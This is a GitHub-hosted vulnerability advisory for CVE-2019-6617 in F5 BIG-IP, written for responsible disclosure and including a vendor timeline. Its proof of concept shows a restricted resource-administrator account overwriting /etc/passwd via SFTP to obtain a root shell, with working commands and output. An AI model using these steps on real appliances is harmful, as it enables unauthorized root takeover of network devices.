Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/F5/CVE-2019-6617.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
139 lines (99 sloc)
3.71 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: F5 BIG-IP Resource Administrator Privilege Escalation | |
| Author: Rich Mirch | |
| CVE: CVE-2019-6617 | |
| Vendor Advisory: https://support.f5.com/csp/article/K38941195 | |
| Description | |
| An F5 BIG-IP account with the resource administrator role while also having | |
| terminal access disabled still has the ability to access the appliance via | |
| SFTP as root. This PoC will show that a resource administrator can obtain root | |
| access to the appliance and take full control with terminal access disabled. | |
| Technical details | |
| A local account configured with the resource administrator role is created as | |
| a Linux user with uid set to zero/root. SSH is not allowed when terminal | |
| access is disabled. The problem is that the SFTP service is still allowed | |
| without any restrictions. Since a resource administrator account is a Linux | |
| root account, it has the ability to overwrite any file on the system. | |
| Note: The SSH service must be enabled and the management interface accessible. | |
| CVSS | |
| Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C | |
| Base: 7.2 | |
| Temporal: 6.9 | |
| Test Environment | |
| F5 BIG-IP Virtual Edition 14.0.0.1 | |
| [root@bigip14:Active:Standalone] ~ # tmsh show sys version | |
| Sys::Version | |
| Main Package | |
| Product BIG-IP | |
| Version 14.0.0.1 | |
| Build 0.0.2 | |
| Edition Point Release 1 | |
| Date Fri Aug 17 16:22:25 PDT 2018 | |
| A resource administrator account(resadmin) with the following attributes was used for this PoC. | |
| Note the shell attribute is set to “none". | |
| [root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password | |
| auth user resadmin { | |
| description resadmin | |
| partition Common | |
| partition-access { | |
| all-partitions { | |
| role resource-admin | |
| } | |
| } | |
| shell none | |
| } | |
| Proof Of Concept | |
| [Step 1] | |
| Show that resadmin is not allowed to SSH. | |
| $ ssh resadmin@5.6.7.8 | |
| Password: | |
| Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4 | |
| This account is currently not available. | |
| Connection to 5.6.7.8 closed. | |
| [Step 2] | |
| Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file. | |
| $ /usr/bin/sftp resadmin@5.6.7.8 | |
| Password: | |
| Connected to 5.6.7.8. | |
| sftp> get /etc/passwd | |
| Fetching /etc/passwd to passwd | |
| /etc/passwd 100% 1423 229.8KB/s 00:00 | |
| sftp> quit | |
| [Step 3] | |
| Update the local passwd file and change /sbin/nologin to /bin/bash for the resadmin user. | |
| $ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd | |
| [Step 4] | |
| Display a diff of the passwd change from step 3. | |
| $ diff -u passwd.orig passwd | |
| --- passwd.orig 2018-09-13 17:32:55.000000000 -0500 | |
| +++ passwd 2018-09-13 17:34:36.000000000 -0500 | |
| @@ -26,4 +26,4 @@ | |
| hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin | |
| syscheck:x:199:10::/:/sbin/nologin | |
| restnoded:x:198:198::/:/sbin/nologin | |
| -resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin | |
| +resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash | |
| [Step 5] | |
| SFTP as resadmin and upload the modified passwd file to /etc/passwd. | |
| $ /usr/bin/sftp resadmin@5.6.7.8 | |
| Password: | |
| Connected to 5.6.7.8. | |
| sftp> cd /etc | |
| sftp> put passwd | |
| Uploading passwd to /etc/passwd | |
| passwd 100% 1419 541.3KB/s 00:00 | |
| sftp> quit | |
| [Step 6] | |
| Login as resadmin via SSH and obtain a bash shell running as the root user. | |
| $ ssh resadmin@5.6.7.8 | |
| Password: | |
| Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4 | |
| [resadmin@bigip14:Active:Standalone] ~ # echo $SHELL | |
| /bin/bash | |
| [resadmin@bigip14:Active:Standalone] ~ # id | |
| uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 | |
| Timeline: | |
| 2018-09-13: Reported to vendor | |
| 2018-09-14: Vendor confirmed vulnerability | |
| 2018-09-26: Vendor requested embargo | |
| 2018-12-07: Contacted vendor for update | |
| 2019-04-30: Vendor released fix and advisory |